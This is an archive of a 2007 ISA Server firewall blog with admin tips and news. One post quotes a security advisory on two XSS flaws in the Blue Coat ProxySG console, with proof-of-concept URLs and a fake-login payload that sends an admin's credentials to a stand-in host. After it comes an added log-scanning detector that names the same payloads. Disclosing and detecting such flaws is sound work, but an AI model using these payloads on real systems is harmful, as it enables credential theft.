Thomas Shinder Blog

Archive: 2007

ISA Firewall Quick Tip : How To Identify a Trial Version of ISA Server 2006

Ever wonder if you’re running a trial or full version of the ISA Firewall? If so, then check out this quick tip from ISA Firewall MVP, Tarek Majdalani at http://elmajdal.net/isaserver/How_To_Identify_a_Tr...6.aspx

HTH,

Tom

Thomas W Shinder, M.D.
Site: http://www.isaserver.org/

Blog: http://blogs.isaserver.org/shinder/
Book: http://tinyurl.com/3xqb7

Email: tshinder@isaserver.org

MVP — Microsoft Firewalls (ISA)

Why Web Proxy Clients Perform Better than SecureNAT Clients

In forward Web proxy scenarios, Web browsers are configured to use the ISA Firewall as their Web proxy. In Internet Explorer, for example, this is done by setting Use a proxy server or Automatically detect settings in Internet Options.

When Web clients are configured to use the ISA Firewall as their Web proxy device, they open connections directly to the ISA Firewall’s Web proxy listener and send it the proxy requests for locations on the Internet. (For example, Internet Explorer will open two connections to the Web proxy component when sending HTTP 1.1 requests.) When the ISA Firewall receives a request for a server, it opens a connection to that server and reuses it for subsequent requests from other clients to the same server. The result is a star connection topology, lower resource utilization on the ISA Firewall, and better performance.

The performance advantage of this scenario is that it allows for high reuse of connections, which minimizes the number of open connections as well as the connection rate.

In transparent proxy scenarios, client Web browsers are unaware of the ISA Firewall’s presence and are configured as SecureNAT clients. They behave as if they were routed directly to servers on the Internet, with no device between the SecureNAT client and the Internet Web server other than routers.

Specifically, SecureNAT clients access Internet servers directly by opening connections with the target Web sites. This leads to a considerable increase in connection rate, because after a user asks for a page on a new server, the Web browser shuts down its connections with the current Web server and opens new connections with the new Web server. This is typical of transparent proxy and has a negative effect on ISA Firewall performance. Typically, the client-side connection rate in transparent proxy is approximately three times higher than in forward proxy, which consumes approximately twice as many processor cycles per request.

Transparent proxy is a popular scenario because it is easy to deploy, especially for Internet service providers (ISPs) that have a heterogeneous client base. Unfortunately, there is a significant performance price to pay for this convenience.

In general, ISA Server requires twice the amount of CPU resources for transparent proxy as compared to forward proxy.

Adapted from http://www.microsoft.com/technet/isa/2006/perf_bp.mspx

HTH,

Tom


ISA 2006 Firewalls Supported on Virtual Server R2

Installing ISA 2006 on Microsoft Virtual Server 2005 R2 is supported.

Because the Windows operating system that hosts Virtual Server cannot be protected by the ISA Firewall on a virtual server, the ISA Firewall in a Virtual Server environment should not be used in an edge firewall scenario, and this configuration is not supported. You can use this configuration securely in other scenarios, such as:

  • A production deployment in which the ISA Firewall on Virtual Server provides Web proxy services such as forward proxy, publishing, and caching, and is protected by an edge firewall, such as an additional ISA Firewall or array of ISA Firewalls
  • A laboratory deployment

If you encounter high \Process\wspsrv\Virtual Bytes performance counter values (values of 1,800,000,000 (1.8 GB) indicate that there may be a problem), you may consider using the ISA Firewall on Virtual Server 2005 R2, as an alternative to buying another ISA server computer. Consider the following:

  • Decide how many guest operating systems the virtual server will host. Once virtual bytes exceed 1.8 GB, consider adding another guest operating system to the computer, after adding 2 GB of RAM for it.
  • Add RAM to the host computer (2 GB for each guest operating system).
  • Install Microsoft Virtual Server 2005 R2 on your server.
  • Install guest operating systems.
  • Install and configure the ISA Firewall on each guest operating system.
  • Use an external load balancer, for example, Domain Name System (DNS) round robin, a hardware-based load balancer, or Windows Network Load Balancing (NLB), to spread traffic among the ISA Firewalls.

Measurements of a remote procedure call (RPC) over Secure HTTP (HTTPS) publishing scenario on a dual-core, dual-processor 2.2 GHz server with 8 GB of RAM showed the following:

  • A single installation of the ISA Firewall on a host computer handled 40000 concurrent connections with approximately 2 GB of virtual memory.
  • Three ISA Firewalls installed on three virtual operating systems handled 60000 concurrent connections with only 1.3 GB used by each virtual computer. This model could be scaled out to more virtual computers (for example, four, eight, and so on) depending on the amount of RAM and the processing power of the hosting server. The tests were run on three computers.
  • CPU utilization in both cases was almost the same.

Adapted from: http://www.microsoft.com/technet/isa/2006/perf_bp.mspx

As you can see, MS Virtual Server 2005 R2 can allow you to significantly scale out your ISA Firewalls to support tens of thousands of additional connections. Keep in mind that the ISA Firewall in a virtual environment cannot protect the host operating system, so you’ll need an ISA Firewall or ISA Firewall array in front of your virtual ISA Firewall environment to protect the host operating system hosting the guest ISA Firewalls.

HTH,

Tom


Scaling Processors and Bandwidth with the 2006 ISA Firewall

In most situations, a single computer has enough processing power to secure traffic going through standard Internet links. According to market research reports on Internet usage, most corporate Internet link bandwidths are between 2 and 20 Mbps. This indicates that an entry-level computer with a single or dual processor will suffice for most ISA Server deployments.

According to outbound firewall test results, ISA Server running on a single Pentium 4 2.4-GHz processor can provide a throughput of approximately 25 Mbps at 75 percent CPU utilization. This means that for each T1 Internet link (1.5 Mbps), the Microsoft Firewall service will utilize only 4.5 percent of the CPU resources. Dual Xeon 2.4-GHz processors can provide a throughput of approximately 45 Mbps (T3) at 75 percent utilization of the CPU, or 2.5 percent utilization of the CPU for every T1.

This is important information for those who are considering using the ISA Firewall as an internal firewall to segregate internal security zones. While 45 Mbps is good for Internet connectivity, it represents a chokepoint for internal networks that run at 100 Mbps and above. You might want to consider a quad core and do some testing if you have higher bandwidth requirements on your internal segments.

From: http://www.microsoft.com/technet/isa/2006/perf_bp.mspx

HTH,

Tom


Fixing Windows Media Player Authentication Prompts

Problem:
WMP sometimes displays auth prompts even though the logged-on user account is resolvable by ISA and has permissions to access the content through ISA policies.

Scenario:
  • ISA web proxy is configured for Windows Integrated authentication
  • ISA enforces authentication for HTTP traffic
  • WinMedia Player is configured to use a proxy (includes “autodiscover” or “browser”) for HTTP protocol

Discussion:
When WMP is acting as a web (CERN) proxy client, and the proxy requires Windows Integrated authentication, WMP will not auto-authenticate to the proxy if the proxy is specified as either FQDN or IP address. If the proxy is specified as NetBIOS (unqualified) name, WMP will auto-authenticate using the interactive account credentials. If the proxy requires Basic or Digest auth, an auth prompt is expected, regardless of how the proxy is specified. This behavior is the same if the proxy is obtained via an autoconfiguration (wpad) script.

By default, ISA 2004+ lists the proxies using their IP addresses in the wpad script. This default was chosen to prevent name resolution errors from impeding normal client-to-web proxy communications. While this works well enough for browsers, WMP “has issues” (yeh; we’ll go with that) when the proxy is specified using anything other than NetBIOS name.

Solution (two-part):
1. Disable the proxy settings for HTTP (pick one).
- Using WMP; Tools, Options, Network, Protocols, HTTP, set to “None”
- Using Regedit:
Key: HKCU\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
Name: ProxyStyle
Type: DWORD
Value: 0
- Using GPO; under “User Configuration\Administrative Templates\Windows Components\Windows Media Player\Networking”, set the “Configure HTTP Proxy” option to “Disabled”

2. Install the FWC from MS downloads http://www.microsoft.com/downloads/details.aspx?Fa...43da89

After making this change, the FWC will handle all HTTP requests from WMP and ISA authentication will now be satisfied through the FWC control channel instead of the HTTP protocol mechanisms. This will stop the random auth prompts from WMP.

Enjoy,
JimmyJoeBob Alooba (A.K.A., Jim Harrison)

HTH,

Tom

Windows Essential Business Server Suite Announced

“Microsoft estimates there are 1.2 million businesses of this size worldwide. Many of them have complex IT requirements. “Their infrastructures really rival those of enterprises,” says Russ Madlener, director of product planning for the Windows Server solutions group. Microsoft’s Small Business Server includes a number of different products installed together on one physical server, but medium-sized companies need more scale and better reliability than they can get with one server.

There will be both a Standard Edition and Premium Edition for the product. Both are based on Windows Server 2008. The Standard Edition will include Exchange Server 2007 for messaging, Forefront Security for Exchange, System Center Essentials for management and the ISA Firewall for firewalling and network security. This will be installed across three separate servers, one each for e-mail, management and security. The Premium Edition will add the next version of SQL Server.

Though companies could buy all of these products today, Windows Essential Business Server should cut costs and deployment headaches to a minimum, since the bundle will be cheaper than buying everything separately and easier to install since it’ll all be integrated. One license will handle all the products together, installation will automatically be done according to best practices and IT admins will have a single administration console from which to manage all of the products.”

For more information, check out:

http://www.informationweek.com/news/showArticle.jh...803464

Two XSS on Blue Coat ProxySG Management Console

Hey, no one ever claimed that Blue Coat was secure. Here you go:

From: <research_at_procheckup.com>
Date: 1 Nov 2007 17:20:04 -0000
PR07-29: Two XSS on Blue Coat ProxySG Management Console

Vulnerability found: 23 July 2007

Vendor informed: 20 August 2007

Vulnerability fixed: 29 October 2007

Advisory publicly released: 1 November 2007

Severity: Medium

Description:

Blue Coat SG400 is vulnerable to a couple of XSS holes.

Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_action/crl_format' / 'name'

Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_from_file.htm' / 'file'

Notes:

The admin user needs to be authenticated (HTTP basic authentication) for the injected JavaScript to run.

Successfully tested on:

Model: Blue Coat SG400
Software SGOS 4.2.1.6
Software Release ID: 25173

Proof of concept #1:

https://target:8082/Secure/Local/console/install_u...t?name="<script>alert("XSS")</script>%00

Injected payload:

"<script>alert("XSS")</script>%00

Proof of concept #2:

https://target:8082/Secure/Local/console/install_u...m?file=<script>alert("XSS")</script><!--

Injected payload:

<script>alert("XSS")</script><!--

A neat payload to inject instead of an alert() box would be a phishing attack which would forward the username and password to a third-party site (the code could be inserted from a third-party site).

i.e.:

<script>
do {
        a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME","");
        b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD","");
}while(a==null || b==null || a=="" || b=="");

alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
</script><!--

Consequences:

An attacker may be able to cause execution of malicious scripting code in the browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG Management Console. Such code would run within the context of the target domain.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: basic auth credentials stolen through a phishing attack as described in the Proof of Concept) to unauthorised third parties.

Fixed in:

4.2.6.1, 5.2.2.5

References:

http://www.procheckup.com/Vulnerability_2007.php
http://www.bluecoat.com/support/securityadvisories...bility

Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)
Received on Nov 01 2007
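As an added defender-side example (not part of the advisory or of this post), the following Python scans web-server access log lines for the two console scripts and parameters the advisory names and flags values carrying the markers its payloads rely on (a script tag, the %00 truncation byte, the unclosed HTML comment). The CLF-style log format and the sample lines are constructed for illustration; they are not real ProxySG output.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Paths and parameters named in the ProCheckUp advisory (PR07-29).
WATCHED = {
    "/Secure/Local/console/install_upload_action/crl_format": {"name"},
    "/Secure/Local/console/install_upload_from_file.htm": {"file"},
}

# Markers used by the advisory's payloads: a script tag, a NUL byte that
# truncates the rest of the page, and an unclosed comment that swallows it.
SUSPICIOUS = re.compile(r"<\s*script|\x00|<!--|javascript:", re.IGNORECASE)

# Constructed sample log lines (CLF-style); assumption, not a real log format.
SAMPLE_LOG = """\
10.0.0.5 - admin [01/Nov/2007:17:20:04 +0000] "GET /Secure/Local/console/install_upload_action/crl_format?name=%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%00 HTTP/1.1" 200 512
10.0.0.5 - admin [01/Nov/2007:17:21:10 +0000] "GET /Secure/Local/console/install_upload_from_file.htm?file=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C!-- HTTP/1.1" 200 640
10.0.0.7 - admin [01/Nov/2007:17:22:00 +0000] "GET /Secure/Local/console/install_upload_from_file.htm?file=intermediate.crl HTTP/1.1" 200 640
10.0.0.7 - admin [01/Nov/2007:17:23:00 +0000] "GET /Secure/Local/console/index.htm HTTP/1.1" 200 100
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_line(line):
    """Return (path, param, decoded_value) when a watched parameter carries a
    suspicious value, otherwise None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = WATCHED.get(parts.path)
    if not params:
        return None  # not one of the console scripts the advisory names
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    for name in params:
        for raw in query.get(name, []):
            value = unquote(raw)  # second decode catches double-encoded input
            if SUSPICIOUS.search(value):
                return (parts.path, name, value)
    return None


def scan_log(text):
    """Scan every line of a log and return the list of findings."""
    return [hit for hit in (scan_line(ln) for ln in text.splitlines()) if hit]


if __name__ == "__main__":
    for path, param, value in scan_log(SAMPLE_LOG):
        print(f"suspicious {param!r} on {path}: {value!r}")
```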

HTH,

Tom


Client requests to access a published Web site are blocked when you configure ISA Server 2006 to allow direct authentication to access a published Web server

You configure a computer that is running Microsoft Internet Security and Acceleration (ISA) Server 2006 to use pass-through authentication to access a published Web server. After you do this, all client requests to access the published Web site are blocked. Additionally, you may receive an error message that resembles the following:

Error Code: 403 Forbidden. ISA Server is configured to block HTTP requests that require authentication. (12250)

  • You experience this issue when you use the No delegation, but client may authenticate directly (pass-through) authentication method.
  • This issue may occur even if the ISA Server 2006 computer publishes a site that requires no authentication.

This issue may occur if the following conditions are true:

  • The Allow client authentication over HTTP check box in the Web listener’s Advanced Authentication Options dialog box is not selected.
  • The Web listener is not enabled to listen for Secure Sockets Layer (SSL) requests.

For the solution, check out the KB article here:

http://support.microsoft.com/kb/924374

HTH,

Tom


Cybercom Group: Cybercom and Microsoft Launch System for Fast, Secure Web-Based Identification

Cybercom (STO:CYBE) and Microsoft developed a secure login solution using e-authentication for Microsoft-based networks. Microsoft’s Internet Security and Acceleration (ISA) Server Firewall and Cybercom’s Trusted Authentication Server form the foundation for the solution, which is called Microsoft Authentication Broker.

“The Microsoft Authentication Broker solution is for enterprises, municipalities, and 24/7 public agencies,” says Tomas Rimming, Security division manager, Cybercom Sweden East, “organizations that need secure, cost-efficient ways to give e-authorized users access to services – users such as customers, inhabitants, and patients.”

Cybercom developed the solution for the Swedish market. It’s built on standard Microsoft Windows Server 2003 components and an ISA 2006 firewall. The solution is adapted for e-authorization from digital certificate issuers such as BankID, Nordea, and TeliaSonera. The Microsoft Authentication Broker supports a mobile standard called BankID in the mobile, which will be launched in Sweden during 2008.

For more information, check out: http://press-releases.techwhack.com/13710/cybercom/

HTH,

Tom

Solving the "All Open" Rule Problem for Acquiring a Machine Certificate from an Enterprise CA

Stefaan Pouseele posted a great blog entry this week on how to configure the Enterprise CA to use a specific port that can be used to make a request to an online Enterprise CA without having to create an “All Open” rule between the ISA Firewall and the CA. Stefaan points out that there are basically four steps:

  • On the CA, configure the RPC application or DCOM endpoint to use a custom TCP protocol port as a static port.
  • On the ISA, turn off the “Enable strict RPC compliance” setting on the RPC access rule.
  • On the ISA, create the custom protocol for outbound use.
  • On the ISA, create an access rule to allow the custom protocol between the required source and destination.

For the details on how to carry out the config, check out Stefaan’s blog at:

http://blogs.isaserver.org/pouseele/2007/10/12/cer...tocol/

HTH,

Tom

